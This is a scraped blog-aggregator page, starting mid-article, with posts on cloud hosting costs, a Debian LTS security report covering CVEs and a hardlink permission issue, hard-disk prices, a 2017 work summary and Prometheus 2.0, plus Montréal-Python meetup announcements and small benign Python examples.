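Under these assumptions the same rack would cost roughly a quarter as much at the local rate, which is the size of the discrepancy the paragraph describes.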

Then there's networking: all those machines need to connect to each other and to an uplink. This means finding a bandwidth provider, which Dyachuk pinned at a reasonable average cost of $1/Mbps. But the most expensive part is not the bandwidth; the cost of managing network infrastructure includes not only installing switches and connecting them, but also tracing misplaced wires, dealing with denial-of-service attacks, and so on. Cabling, a seemingly innocuous task, is actually the majority of hardware expenses in data centers, as previously reported. From networking, Dyachuk went on to detail the remaining cost estimates, including storage and backups, where the physical world is again cheaper than the cloud. All this is, of course, assuming that crafty system administrators can figure out how to glue all the hardware together into a meaningful package.

Which brings us to the sensitive question of staff costs; Dyachuk described those as "substantial". These costs are for the system and network administrators who are needed to buy, order, test, configure, and deploy everything. Evaluating those costs is subjective: for example, salaries will vary between different countries. He fixed the person yearly salary costs at $250,000 (counting overhead and an actual $150,000 salary) and accounted for three people on staff. Those costs may also vary with the colocation service; some will include remote hands and networking, but he assumed in his calculations that the costs would end up being roughly the same because providers will charge extra for those services.

Dyachuk also observed that staff costs are the majority of the expenses in a colocation environment: "hardware is cheaper, but requires a lot more people". In the cloud, it's the opposite; most of the costs consist of computation, storage, and bandwidth. Staff also introduce a human factor of instability in the equation: in a small team, there can be a lot of variability in ability levels. This means there is more uncertainty in colocation cost estimates.

In our discussions after the conference, Dyachuk pointed out a social aspect to consider: cloud providers are operating a virtual oligopoly. Dyachuk worries about the impact of Amazon's growing power over different markets:

A lot of businesses are in direct competition with Amazon. A fear of losing commercial secrets and being spied upon has not been confirmed by any incidents yet. But Walmart, for example, moved out of AWS and requested that its suppliers do the same.

Demand management

Once the extra costs described are factored in, colocation still would appear to be the cheaper option. But that doesn't take into account the question of capacity: a key feature of cloud providers is that they pool together large clusters of machines, which allow individual tenants to scale up their services quickly in response to demand spikes. Self-hosted servers need extra capacity to cover for future demand. That means paying for hardware that stays idle waiting for usage spikes, while cloud providers are free to re-provision those resources elsewhere.

Satisfying demand in the cloud is easy: allocate new instances automatically and pay the bill at the end of the month. In a colocation, provisioning is much slower and hardware must be systematically over-provisioned. Those extra resources might be used for preemptible batch jobs in certain cases, but workloads are often "transaction-oriented" or "realtime" which require extra resources to deal with spikes. So the "spike to average" ratio is an important metric to evaluate when making the decision between the cloud and colocation.
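As a minimal sketch, the "spike to average" ratio can be computed from a series of load samples as the peak divided by the mean. The function name and the sample data below are hypothetical; the talk did not prescribe a specific formula.

```python
from statistics import mean

def spike_to_average(samples):
    """Return peak demand divided by mean demand for a series of load samples."""
    if not samples:
        raise ValueError("need at least one sample")
    avg = mean(samples)
    if avg <= 0:
        raise ValueError("average demand must be positive")
    return max(samples) / avg

# Hypothetical hourly request rates for one service (made-up numbers).
hourly_load = [100, 120, 110, 400, 130, 100]
ratio = spike_to_average(hourly_load)
print(f"spike to average ratio: {ratio}")
```

A ratio close to 1 means the hardware is busy most of the time, which favors colocation; a high ratio means self-hosted capacity would sit idle between spikes.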

Cost reductions are possible by improving analytics to reduce over-provisioning. Kubernetes makes it easier to estimate demand; before containerized applications, estimates were per application, each with its margin of error. By pooling together all applications in a cluster, the problem is generalized and individual workloads balance out in aggregate, even if they fluctuate individually. Therefore Dyachuk recommends using the cloud when future growth cannot be forecast, to avoid the risk of under-provisioning. He also recommended "The Art of Capacity Planning" as a good forecasting resource; even though the book is old, the basic math hasn't changed so it is still useful.
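The pooling effect can be illustrated with a toy example: when spikes do not coincide, the peak of the combined load is smaller than the sum of the individual peaks. The application names and numbers below are invented for illustration only.

```python
# Hypothetical per-hour demand (in CPU cores) for three applications whose
# spikes happen at different times; the numbers are made up.
demand = {
    "web":    [10, 40, 10, 10],
    "batch":  [10, 10, 40, 10],
    "search": [40, 10, 10, 10],
}

# Sizing each application separately means provisioning for every peak.
separate_capacity = sum(max(series) for series in demand.values())

# Sizing the pooled cluster means provisioning for the peak of the total.
total_per_hour = [sum(hour) for hour in zip(*demand.values())]
pooled_capacity = max(total_per_hour)

print(f"separate sizing: {separate_capacity} cores")
print(f"pooled sizing:   {pooled_capacity} cores")
```

The saving disappears if all applications spike at the same time, so this only helps when workloads are at least partly uncorrelated.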

The golden ratio

Colocation prices finally overshoot cloud prices after adding extra capacity and staff costs. In closing, Dyachuk identified the crossover point where colocation becomes cheaper at around $100,000 per month, or 150 Amazon m4.2xlarge instances, which can be seen in the graph below. Note that he picked a different instance type for the actual calculations: instead of the largest instance (m4.10xlarge), he chose the more commonly used m4.2xlarge instance. Because Amazon pricing scales linearly, the math works out to about the same once reserved instances, storage, load balancing, and other costs are taken into account.

He also added that the figure will change based on the workload; Amazon is more attractive with more CPU and less I/O. Inversely, I/O-heavy deployments can be a problem on Amazon; disk and network bandwidth are much more expensive in the cloud. For example, bandwidth can sometimes be more than triple what you can easily find in a data center.

Your mileage may vary; those numbers shouldn't be taken as an absolute. They are a baseline that needs to be tweaked according to your situation, workload and requirements. For some, Amazon will be cheaper, for others, colocation is still the best option.

He also emphasized that the graph stops at 500 instances; beyond that lies another "wall" of investment due to networking constraints. At around the equivalent of 2000-3000 Amazon instances, networking becomes a significant bottleneck and demands larger investments in networking equipment to upgrade internal bandwidth, which may make Amazon affordable again. It might also be that application design should shift to a multi-cluster setup, but that implies increases in staff costs.

Finally, we should note that some organizations simply cannot host in the cloud. In our discussions, Dyachuk specifically expressed concerns about Canada's government services moving to the cloud, for example: what is the impact on state sovereignty when confidential data about its citizens ends up in the hands of private contractors? So far, Canada's approach has been to only move "public data" to the cloud, but Dyachuk pointed out this already includes sensitive departments like correctional services.

In Dyachuk's model, the cloud offers significant cost reduction over traditional hosting in small clusters, at least until a deployment reaches a certain size. However, different workloads significantly change that model and can make colocation attractive again: I/O and bandwidth intensive services with well-planned growth rates are clear colocation candidates. His model is just a start; any project manager would be wise to make their own calculations to confirm the cloud really delivers the cost savings it promises. Furthermore, while Dyachuk wisely avoided political discussions surrounding the impact of hosting in the cloud, data ownership and sovereignty remain important considerations that shouldn't be overlooked.

A YouTube video and the slides [PDF] from Dyachuk's talk are available online.

This article first appeared in the Linux Weekly News, under the title "The true costs of hosting in the cloud".

Catégories: External Blogs

Montréal-Python 70: Atomic Zucchini - Call For Proposals

Montreal Python - lun, 02/26/2018 - 00:00

We are looking for speakers for our next meetup. It's your chance to show the community what you've discovered with your favorite language.

Submit your proposal of 20 to 30 minutes, or even a lightning talk proposal (5 min), at team@montrealpython.org or come join us in our Slack channel if you would like to discuss it at http://slack.mtlpy.org/

When

Monday, March 12th, 2018

Where

Shopify offices

490 Rue de la Gauchetière O,

Montréal, QC H2Z 0B2

https://goo.gl/maps/kFbDrJYsqtS2

Catégories: External Blogs

January 2018 report: LTS

Anarcat - ven, 02/02/2018 - 17:25

I have already published a yearly report which covers all of 2017 but also some of my January 2018 work, so I'll try to keep this short.

Debian Long Term Support (LTS)

This is my monthly Debian LTS report. I was happy to switch to the new Git repository for the security tracker this month. It feels like some operations (namely pull / push) are a little slower, but others, like commits or log inspection, are much faster. So I think it is a net win.

jQuery

I did some work on trying to clean up a situation with the jQuery package, which I explained in more detail in a long post. It turns out there are multiple databases out there that track security issues in web development environments (like JavaScript, Ruby or Python) but do not follow the normal CVE tracking system. This means that Debian had a few vulnerabilities in its jQuery packages that were not tracked by the security team, in particular three that were only on Snyk.io (CVE-2012-6708, CVE-2015-9251 and CVE-2016-10707). The resulting discussion was interesting and is worth reading in full.

A more worrying aspect is that this problem is not limited to flashy new web frameworks. Ben Hutchings estimated that almost half of the Linux kernel vulnerabilities are not tracked by CVE. It seems the consensus is that we want to try to follow the CVE process, and Mitre has been helpful in distributing this by letting other entities, called CVE Numbering Authorities or CNA, issue their own CVEs. After contacting Snyk, it turns out that they have started the process of becoming a CNA and are trying to make this part of their workflow, so that's a good sign.

LTS meta-work

I've done some documentation and architecture work on the LTS project itself, mostly around updating the wiki with current practices.

OpenSSH DLA

I've done a quick security update of OpenSSH for LTS, which resulted in DLA-1257-1. Unfortunately, after a discussion with the security researcher who published that CVE, it turned out that this was only a "self-DOS", i.e. that the NEWKEYS attack would only make the SSH client terminate its own connection, and therefore not impact the rest of the server. One has to wonder, in that case, why this was issued a CVE at all: presumably the vulnerability could be leveraged somehow, but I did not look deeply enough into it to figure that out.

Hopefully the patch won't introduce a regression: I tested this summarily and it didn't seem to cause any issues at first glance.

Hardlinks attacks

An interesting attack (CVE-2017-18078) was discovered against systemd where the "tmpfiles" feature could be abused to bypass filesystem access restrictions through hardlinks. The trick is that the attack is possible only if kernel hardening (specifically fs.protected_hardlinks) is turned off. That feature is available in the Linux kernel since the 3.6 release, but was actually turned off by default in 3.7. In the commit message, Linus Torvalds explained the change was breaking some userland applications, which is a huge taboo in Linux, and recommended that distros configure this at boot instead. Debian took the reverse approach and Hutchings issued a patch which reverts the default to the more secure default. But this means users of custom kernels are still vulnerable to this issue.
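To check whether a given machine has the hardening enabled, one can read the sysctl through procfs. This is a minimal sketch: the helper name is made up, and it assumes a Linux system where /proc is mounted.

```python
from pathlib import Path

# Standard procfs location of the fs.protected_hardlinks sysctl on Linux.
SYSCTL_PATH = Path("/proc/sys/fs/protected_hardlinks")

def hardlink_protection_enabled(path=SYSCTL_PATH):
    """Return True or False for the sysctl value, or None if it cannot be read."""
    try:
        value = Path(path).read_text().strip()
    except OSError:
        # Not Linux, /proc not mounted, or a kernel without this sysctl.
        return None
    return value == "1"

state = hardlink_protection_enabled()
if state is None:
    print("could not read fs.protected_hardlinks")
elif state:
    print("hardlink protection is enabled")
else:
    print("hardlink protection is DISABLED")
```

The same value can be inspected from a shell with sysctl fs.protected_hardlinks.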

But, more importantly, this affects more than systemd. The vulnerability also happens when using plain old chown with hardening turned off, when running a simple command like this:

chown -R non-root /path/owned/by/non-root

I didn't realize this, but hardlinks share permissions: if you change permissions on file a that's hardlinked to file b, both files have the new permissions, because both names point to the same inode. This is especially nasty if users can hardlink to critical files like /etc/passwd or suid binaries, which is why the hardening was introduced in the first place.
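The shared-permissions behavior is easy to reproduce safely in a temporary directory. The following sketch only touches files it creates itself; the file names are arbitrary.

```python
import os
import stat
import tempfile

with tempfile.TemporaryDirectory() as tmp:
    a = os.path.join(tmp, "a")
    b = os.path.join(tmp, "b")
    with open(a, "w") as f:
        f.write("hello\n")
    os.chmod(a, 0o600)
    os.link(a, b)        # b is a second name for the same inode

    os.chmod(a, 0o644)   # change the mode through the name "a" only

    same_inode = os.stat(a).st_ino == os.stat(b).st_ino
    mode_b = stat.S_IMODE(os.stat(b).st_mode)
    link_count = os.stat(a).st_nlink

print(f"same inode: {same_inode}")
print(f"mode seen through b: {oct(mode_b)}")
print(f"link count: {link_count}")
```

Ownership works the same way, which is why a recursive chown run by root over a directory an unprivileged user controls can end up changing the owner of whatever file that user managed to hardlink into it.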

In Debian, this is especially an issue in maintainer scripts, which often call chown -R on arbitrary, non-root directories. Daniel Kahn Gillmor had reported this to the Debian security team all the way back in 2011, but it didn't get traction back then. He now opened Debian bug #889066 to at least enable a warning in lintian, and an issue was also opened against colord (Debian bug #889060) as an example, but many more packages are vulnerable. Again, this is only if hardening is somehow turned off.

Normally, systemd is supposed to turn that hardening on, which should protect custom kernels, but this was turned off in Debian. Anyway, Debian still supports non-systemd init systems (although most of those users have probably migrated to Devuan) so the fix wouldn't be complete. I have therefore filed Debian bug #889098 against procps (which owns /etc/sysctl.conf and related files) to try and fix the issue more broadly there.

And to be fair, this was very explicitly mentioned in the jessie release notes so those people without the protection kind of get what they deserve here...

p7zip

Lastly, I did a fairly trivial update of the p7zip package, which resulted in DLA-1268-1. The patch was sent upstream and went through a few iterations, including coordination with the security researcher.

Unfortunately, the latter wasn't willing to share the proof of concept (PoC) so that we could test the patch. We are therefore trusting the researcher that the fix works, which is too bad because they do not trust us with the PoC...

Other free software work

I probably did more stuff in January that wasn't documented in the previous report. But I don't know if it's worth my time going through all this. Expect a report in February instead!

Have a happy new year and all that stuff.

Catégories: External Blogs

Montréal-Python 69 - Yogic Zumba

Montreal Python - mer, 01/31/2018 - 00:00

It may be the middle of winter but it's no reason to stay at home. Take out your warmest toque, your snowshoes and join us at Notman House for the first event of the season.

Schedule
  • 6:00PM - Doors open
  • 6:30PM - Presentations start
  • 7:30PM - Break
  • 9:00PM - End of the event
  • 9:15PM - Benelux
Presentations

How to use PGP with Git and why you should care - Konstantin Ryabitsev

Git supports PGP signatures for the purposes of tracking code provenance and to ensure the integrity of repository clones across multiple mirrors. In this talk, we will discuss how your project can benefit from PGP-signing your tags and your commits, and will look at available resources that will help you get started with minimal pain.

Configuration management - Michel Rondeau

Configuration management with Python's standard library is effective as long as the "ini" format is suitable. We wanted to reproduce it while supporting any file format. The chosen solution works with events and plug-ins in order to add or remove features dynamically. It is now possible to handle Excel, YAML, JSON, and other formats. We will see how to set up an elegant event queue in Python, as used in this project.

morpheOm - François Robert

Ever since the Xerox lab in Palo Alto invented the desktop, user interfaces have changed little. Fortunately, phones and tablets have helped, but are we ripe for a bigger change?

How to Aggregate User’s Interest Data using PySpark – A Short Tutorial - Abbas Taher

Spark is one of the most popular Big Data frameworks and PySpark is the API to use Spark from Python. PySpark is a great choice when you need to scale up your jobs to work with large files. In this short tutorial we shall present 3 methods to aggregate data. First we shall use Python dictionaries, then we shall present the two methods “GroupBy” and “ReduceBy” to do the same aggregation work. The three code snippets will be presented and explained using a Jupyter Notebook.

When

February 5th at 6:00PM

Where

Notman House 51 Sherbrooke West Montréal, QC H2X 1X2

Catégories: External Blogs

4TB+ large disk price review

Anarcat - sam, 01/27/2018 - 20:39

For my personal backups, I am now looking at 4TB+ single-disk long-term storage. I currently have 3.5TB of offline storage, split across two disks: this is rather inconvenient as I need to plug both into a toaster-like SATA enclosure which gathers dust and performs like crap. Now I'm looking at hosting offline backups at a friend's place so I need to store everything in a single drive, to save space.

This means I need at least 4TB of storage, and those needs are going to continuously expand in the future. Since this is going to be offsite, swapping the drive isn't really convenient (especially because syncing all that data takes a long time), so I figured I would also look at more than 4 TB.

So I built those neat little tables. I took the prices from Newegg.ca or Newegg.com as a fallback when the item wasn't available in Canada. I used to order from NCIX because it was "more" local, but they unfortunately went bankrupt and in the worst possible way: the website is still up and you can order stuff, but those orders never ship. Sad to see a 20-year-old institution go out like that; I blame Jeff Bezos.

I also used failure rate figures from the latest Backblaze review, although those should always be taken with a grain of salt. For example, the apparently stellar 0.00% failure rates are all on sample sizes too small to be statistically significant (<100 drives).
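To see why a 0.00% figure on a small sample says little, here is a rough sketch that treats each drive as one independent trial and asks how high the true failure probability could still be after observing zero failures. This is a simplification of however the review computes its rates, and the function name and 95% confidence level are assumptions of this sketch.

```python
def zero_failure_upper_bound(drives, confidence=0.95):
    """Upper bound on the failure probability after 0 failures in `drives` trials."""
    if drives <= 0:
        raise ValueError("drives must be positive")
    # Solve (1 - p) ** drives = 1 - confidence for p.
    return 1 - (1 - confidence) ** (1 / drives)

for drives in (10, 50, 100, 1000):
    bound = zero_failure_upper_bound(drives)
    print(f"{drives:>5} drives, 0 failures: true rate could still be up to {bound:.2%}")
```

With fewer than 100 drives the bound stays around 3% or higher, which overlaps with most of the non-zero failure rates in the tables, so those drives cannot be called more reliable on that evidence alone.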

All prices are in CAD, sometimes after conversion from USD for items that are not on newegg.ca, as of today.

8TB

Brand    Model            Price  $/TB  fail%  Notes
HGST     0S04012          280$   35$   N/A
Seagate  ST8000NM0055     320$   40$   1.04%
WD       WD80EZFX         364$   46$   N/A
Seagate  ST8000DM002      380$   48$   0.72%
HGST     HUH728080ALE600  791$   99$   0.00%

6TB

Brand    Model            Price  $/TB  fail%  Notes
HGST     0S04007          220$   37$   N/A
Seagate  ST6000DX000      ~222$  56$   0.42%  not on .ca, refurbished
Seagate  ST6000AS0002     230$   38$   N/A
WD       WD60EFRX         280$   47$   1.80%
Seagate  STBD6000100      343$   58$   N/A

4TB

Brand    Model            Price  $/TB  fail%  Notes
Seagate  ST4000DM004      125$   31$   N/A
Seagate  ST4000DM000      150$   38$   3.28%
WD       WD40EFRX         155$   39$   0.00%
HGST     HMS5C4040BLE640  ~242$  61$   0.36%  not on .ca
Toshiba  MB04ABA400V      ~300$  74$   0.00%  not on .ca

Conclusion

Cheapest per TB costs seem to be in the 4TB range, but the 8TB HGST comes really close. Reliability for this drive could be an issue, however - I can't explain why it is so cheap compared to other devices... But I guess we'll see where it goes as I'll just order the darn thing and try it out.
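The per-terabyte comparison behind that conclusion is simple division. This sketch uses the cheapest drive from each capacity class, with prices in CAD taken from the tables; the dictionary layout is just one convenient way to hold them.

```python
# Cheapest drive in each capacity class (TB -> model, price in CAD).
cheapest = {
    8: ("HGST 0S04012", 280),
    6: ("HGST 0S04007", 220),
    4: ("Seagate ST4000DM004", 125),
}

# Price per terabyte for each capacity class.
per_tb = {
    capacity: price / capacity
    for capacity, (model, price) in cheapest.items()
}

# Print from cheapest to most expensive per terabyte.
for capacity, cost in sorted(per_tb.items(), key=lambda item: item[1]):
    model = cheapest[capacity][0]
    print(f"{capacity}TB {model}: {cost:.2f} CAD/TB")
```

The 4TB drive wins on price per terabyte, with the 8TB HGST a few dollars behind, which is the trade-off described above.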

Catégories: External Blogs

A summary of my 2017 work

Anarcat - sam, 01/27/2018 - 11:53

New years are strange things: for most arbitrary reasons, around January 1st we reset a bunch of stuff, change calendars and forget about work for a while. This is also when I forget to do my monthly report and then procrastinate until I figure out I might as well do a year report while I'm at it, and then do nothing at all for a while.

So this is my humble attempt at fixing this, about a month late. I'll try to cover December as well, but since not much has happened then, I figured I could also review the last year and think back on the trends there. Oh, and you'll get chocolate cookies of course. Hang on to your eyeballs, this won't hurt a bit.

Debian Long Term Support (LTS)

Those of you used to reading those reports might be tempted to skip this part, but wait! I actually don't have much to report here and instead you will find an incredibly insightful and relevant rant.

So I didn't actually do any LTS work in December. I actually reduced my available hours to focus on writing (more on that later). Overall, I ended up working about 11 hours per month on LTS in 2017. That is less than the 16-20 hours I was available during that time. Part of that is me regularly procrastinating, but another part is that finding work to do is sometimes difficult. The "easy" tasks often get picked and dispatched quickly, so what remains, when you're not constantly looking, is often the very difficult packages.

I especially remember the pain of working on libreoffice, the KRACK update, more tiff, GraphicsMagick and ImageMagick vulnerabilities than I care to remember, and, ugh, Ruby... Masochists (also known as "security researchers") can find the details of those excruciating experiments in debian-lts for the monthly reports.

I don't want to sound like an old idiot, but I must admit, after working on LTS for two years, that working on patching old software for security bugs is hard work, and not particularly pleasant on top of it. You're basically always dealing with other people's garbage: badly written code that hasn't been touched in years, sometimes decades, that no one wants to take care of.

Yet someone needs to take care of it. A large part of the technical community considers Linux distributions in general, and LTS releases in particular, as "too old to care for". As if our elders, once they passed a certain age, should just be rolled out to the nearest dumpster or just left rotting on the curb. I suspect most people don't realize that Debian "stable" (stretch) was released less than a year ago, and "oldstable" (jessie) is a little over two years old. LTS (wheezy), our oldest supported release, is only four years old now, and will become unsupported this summer, on its fifth year anniversary. Five years may seem like a long time in computing but really, there's a whole universe out there and five years is absolutely nothing in the range of changes I'm interested in: politics, society and the environment range much beyond that shortsightedness.

To put things in perspective, some people I know still run their office on an Apple II, which celebrated its 40th anniversary this year. That is "old". And the fact that the damn thing still works should command respect and admiration, more than contempt. In comparison, the phone I have, an LG G3, is running an unpatched, vulnerable version of Android because it cannot be updated, because it's locked out of the telcos networks, because it was found in a taxi and reported "lost or stolen" (same thing, right?). And DRM protections in the bootloader keep me from doing the right thing and unbricking this device.

We should build devices that last decades. Instead we fill junkyards with tons and tons of precious computing devices that have more precious metals than most people carry as jewelry. We are wasting generations of programmers, hardware engineers, human robots and precious, rare metals on speculative, useless devices that are destroying our society. Working on supporting LTS is a small part in trying to fix the problem, but right now I can't help but think we have a problem upstream, in the way we build those tools in the first place. It's just depressing to be at the receiving end of the billions of lines of code that get created every year. Hopefully, the death of Moore's law could change that, but I'm afraid it's going to take another generation before programmers figure out how far away from their roots they have strayed. Maybe too long to keep ourselves from a civilization collapse.

LWN publications

With that gloomy conclusion, let's switch gears and talk about something happier. So as I mentioned, in December, I reduced my LTS hours and focused instead on finishing my coverage of KubeCon Austin for LWN.net. Three articles have already been published on the blog here:

... and two more articles, about Prometheus, are currently published as exclusives by LWN:

I was surprised to see that the container runtimes article got such traction. It wasn't the most important debate in the whole conference, but there were some amazingly juicy bits, some of which we didn't even cover because those were... uh... rather controversial and we want the community to stay sane. Or saner, if that word can be applied at all to the container community at this point.

I ended up publishing 16 articles at LWN this year. I'm really happy about that: I just love writing and even if it's in English (my native language is French), it's still better than rambling on my own like I do here. My editors allow me to publish well polished articles, and I am hugely grateful for the privilege. Each article takes about 13 hours to write, on average. I'm less happy about that: I wish delivery was more streamlined and I'll spare you the miserable story of the last-minute major changes I sent in for some recent articles, for which I again apologize profusely to my editors.

I'm often at a loss when I need to explain to friends and family what I write about. I often give the example of the password series: I wrote a whole article about just how to pick a passphrase, then a review of two geeky password managers, and then a review of something that's not quite a password manager and that you shouldn't be using. And on top of that, I even wrote a history of those but by that time my editors were sick and tired of passwords and understandably made me go away. At this point, neophytes are just scratching their heads and I remind them of the TL;DR:

  1. choose a proper password with a bunch of words picked at random (really random, check out Diceware!)

  2. use a password manager so you have to remember only one good password

  3. watch out where you type those damn things
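The first step can be sketched with Python's secrets module, which draws from the operating system's secure random source. The word list below is a tiny hypothetical stand-in (a real Diceware list has 7,776 entries, one per outcome of five dice rolls), and the six-word default is an assumption of this sketch rather than advice from the articles.

```python
import secrets

def passphrase(wordlist, words=6, separator=" "):
    """Pick `words` entries from `wordlist` using a cryptographically secure RNG."""
    if len(wordlist) < 2:
        raise ValueError("wordlist is too small to be useful")
    return separator.join(secrets.choice(wordlist) for _ in range(words))

# Hypothetical stand-in list; far too short for real use.
SAMPLE_WORDS = ["correct", "horse", "battery", "staple",
                "cookie", "yeti", "zumba", "toque"]

print(passphrase(SAMPLE_WORDS))
```

The important part is that the words are chosen by the random source and not by the user; picking words that "feel random" defeats the purpose.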

I covered two other conferences this year as well: one was the NetDev conference, for which I wrote 4 articles (1, 2, 3, 4). It turned out I couldn't cover NetDev in Korea even though I wanted to, but hopefully that is just "partie remise" as we say in French... I also covered DebConf in Montreal, but that ended up being much harder than I thought: I got involved in networking and volunteered all over the place. By the time the conference started, I was too exhausted to actually write anything, even though I took notes like crazy and ran around trying to attend everything. I found it's harder to write about topics that are close to home: nothing is new, so you don't get excited as much. I still enjoyed writing about the supposed decline of copyleft, which was based on a talk by FSF executive director John Sullivan, and I ended up writing about offline PGP key storage strategies and cryptographic keycards, after buying a token from friendly gniibe at DebConf.

I also wrote about Alioth moving to Pagure, unknowingly joining up with a long tradition of failed predictions at LWN: a few months later, the tide turned and Debian launched the Alioth replacement as a beta running... GitLab. Go figure - maybe this is a version of the quantum observer effect applied to journalism?

Two articles seemed to have been less successful. The GitHub TOS update was less controversial than I expected it would be and didn't seem to have a significant impact, although GitHub did rephrase some bits of their TOS eventually. The ROCA review didn't seem to bring excited crowds either, maybe because no one actually understood anything I was saying (including myself).

Still, 2017 has been a great ride in LWN-land: I'm hoping to publish even more during the next year and encourage people to subscribe to the magazine, as it helps us publish new articles, if you like what you're reading here of course.

Free software work

Last but not least is my free software work. This was just nuts.

New programs

I have written a bunch of completely new programs:

  • Stressant - a small wrapper script to stress-test new machines. no idea if anyone's actually using the darn thing, but I have found it useful from time to time.

  • Wallabako - a bridge between Wallabag and my e-reader. This is probably one of my most popular programs ever. I get random strangers asking me about it in random places, which is quite nice. Also my first Golang program, something I am quite excited about and wish I was doing more of.

  • Ecdysis - a pile of (Python) code snippets, documentation and standard community practices I reuse across projects. Ended up being really useful when bootstrapping new projects, but probably just for me.

  • numpy-stats - a dumb commandline tool to extract stats from streams. didn't really reuse it so maybe not so useful. interestingly, found similar tools called multitime and hyperfine that will be useful for future benchmarks

  • feed2exec - a new feed reader (just that) which I have been using ever since for many different purposes. I have now replaced feed2imap and feed2tweet with that simple tool, and have added support for storing my articles on https://archive.org/, checking for dead links with linkchecker (below) and pushing to the growing Mastodon federation

  • undertime - a simple tool to show possible meeting times across different timezones. a must if you are working with people internationally!

If I count this right (and I'm omitting a bunch of smaller, less general purpose programs), that is six new software projects, just this year. This seems crazy, but that's what the numbers say. I guess I like programming too, which is arguably a form of writing. Talk about contributing to the pile of lines of code...

New maintainerships

I also got more or less deeply involved in various communities:

And those are just the major ones... I have about 100 repositories active on GitHub, most of which are forks of existing repositories, so actual contributions to existing free software projects. Hard numbers for this are annoyingly hard to come by as well, especially in terms of issues vs commits and so on. GitHub says I have made about 600 contributions in the last year, which is an interesting figure as well.

Debian contributions

I also did a bunch of things in the Debian project, apart from my LTS involvement:

  • Gave up on debmans, a tool I had written to rebuild https://manpages.debian.org, in the face of the overwhelming superiority of the Golang alternative. This is one of the things which led me to finally try the language and write Wallabako. So: net win.

  • Proposed standard procedures for third-party repositories, which didn't seem to have caught on significantly in the real world. Hopefully just a matter of time...

  • Co-hosted a bug squashing party for the Debian stretch release, also as a way to have the DebConf team meet up.

  • That led to a two-hour workshop at Montreal DebConf which was packed and really appreciated. I'm thinking of organizing this at every DebConf I attend, in a (so far) secret plot to standardize packaging practices by evangelizing new package maintainers to my peculiar ways. I hope to teach again in Taiwan this year, but I'm not sure I'll make it that far across the globe...

  • And of course, I did a lot of regular package maintenance. I don't have good numbers on the exact activity stats here (any way to pull that out easily?) but I now directly maintain 34 Debian packages, a somewhat manageable number.

What's next?

This year, I'll need to figure out what to do with legacy projects. Gameclock and Monkeysign both need to be ported away from GTK2, which is deprecated. I will probably abandon the GUI in Monkeysign but gameclock will probably need a rewrite of its GUI. This begs the question of how we can maintain software in the long term if even the graphical interface (even Xorg is going away!) is swept away under our feet all the time. Without this change, both programs could have kept on going for another decade without trouble. But now, I need to spend time just to keep those tools from failing to build at all.

Wallabako seems to be doing well on its own, but I'd like to fix the refresh issues that make the reader sometimes unstable: maybe I can write directly to the SQLite database? I tried statically linking SQLite to test that, but it is apparently impossible, and the attempt failed.

Feed2exec just works for me. I'm not very proud of the design, but it does its job well. I'll fix bugs and maybe push out a 1.0 release when a long enough delay goes by without any critical issues coming up. So try it out and report back!

As for the other projects, I'm not sure how it's going to go. It's possible that my involvement in paid work means I cannot commit as much to general free software work, but I can't help but keep doing those drive-by contributions all the time. There's just too much stuff broken out there to sit by and watch the dumpster fire burn down the whole city.

I'll try to keep doing those reports, of which you can find an archive in monthly-report. Your comments, encouragements, and support make this worth it, so keep those coming!

Happy new year everyone: may it be better than the last, shouldn't be too hard...

PS: Here is the promised chocolate cookie:

Catégories: External Blogs

Changes in Prometheus 2.0

Anarcat - mer, 01/24/2018 - 19:00

This is one part of my coverage of KubeCon Austin 2017. Other articles include:

2017 was a big year for the Prometheus project, as it published its 2.0 release in November. The new release ships numerous bug fixes, new features and, notably, a new storage engine that brings major performance improvements. This comes at the cost of incompatible changes to the storage and configuration-file formats. An overview of Prometheus and its new release was presented to the Kubernetes community in a talk held during KubeCon + CloudNativeCon. This article covers what changed in this new release and what is brewing next in the Prometheus community; it is a companion to this article, which provided a general introduction to monitoring with Prometheus.

What changed

Orchestration systems like Kubernetes regularly replace entire fleets of containers for deployments, which means rapid changes in parameters (or "labels" in Prometheus-talk) like hostnames or IP addresses. This was creating significant performance problems in Prometheus 1.0, which wasn't designed for such changes. To correct this, Prometheus ships a new storage engine that was specifically designed to handle continuously changing labels. This was tested by monitoring a Kubernetes cluster where 50% of the pods would be swapped every 10 minutes; the new design was proven to be much more effective. The new engine boasts a hundred-fold I/O performance improvement, a three-fold improvement in CPU, five-fold in memory usage, and increased space efficiency. This matters most for container deployments, but it means improvements for any configuration as well. Anecdotally, there was no noticeable extra load on the servers where I deployed Prometheus, at least nothing that the previous monitoring tool (Munin) could detect.

Prometheus 2.0 also brings new features like snapshot backups. The project has a longstanding design wart regarding data volatility: backups are deemed to be unnecessary in Prometheus because metrics data is considered disposable. According to Goutham Veeramanchaneni, one of the presenters at KubeCon, "this approach apparently doesn't work for the enterprise". Backups were possible in 1.x, but they involved using filesystem snapshots and stopping the server to get a consistent view of the on-disk storage. This implied downtime, which was unacceptable for certain production deployments. Thanks again to the new storage engine, Prometheus can now perform fast and consistent backups, triggered through the web API.

Another improvement is a fix to the longstanding staleness handling bug where it would take up to five minutes for Prometheus to notice when a target disappeared. In that case, when polling for new values (or "scraping" as it's called in Prometheus jargon) a failure would make Prometheus reuse the older, stale value, which meant that downtime would go undetected for too long and fail to trigger alerts properly. This would also cause problems with double-counting of some metrics when labels vary in the same measurement.

Another limitation related to staleness is that Prometheus wouldn't work well with scrape intervals above two minutes (instead of the default 15 seconds). Unfortunately, that is still not fixed in Prometheus 2.0 as the problem is more complicated than originally thought, which means there's still a hard limit to how slowly you can fetch metrics from targets. This, in turn, means that Prometheus is not well suited for devices that cannot support sub-minute refresh rates, which, to be fair, is rather uncommon. For slower devices or statistics, a solution might be the node exporter "textfile support", which we mentioned in the previous article, and the pushgateway daemon, which allows pushing results from the targets instead of having the collector pull samples from targets.
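As a rough illustration of the push model mentioned above, here is a minimal Python sketch that builds a request for the pushgateway's /metrics/job/<job> endpoint using only the standard library. The gateway address, job name, and metric name in the usage note are hypothetical; the function names are made up for this example, and the request is built separately from being sent so that it can be inspected first.

```python
import urllib.parse
import urllib.request


def build_push_request(gateway_url, job, name, value):
    """Build (but do not send) a request pushing one sample for a job."""
    # The body uses the same text format as /metrics and must end with a newline.
    body = f"{name} {value}\n".encode("utf-8")
    job_path = urllib.parse.quote(job, safe="")
    url = f"{gateway_url.rstrip('/')}/metrics/job/{job_path}"
    return urllib.request.Request(url, data=body, method="POST")


def push(request, timeout=10):
    """Send the request; raises urllib.error.URLError on failure."""
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return response.status
```

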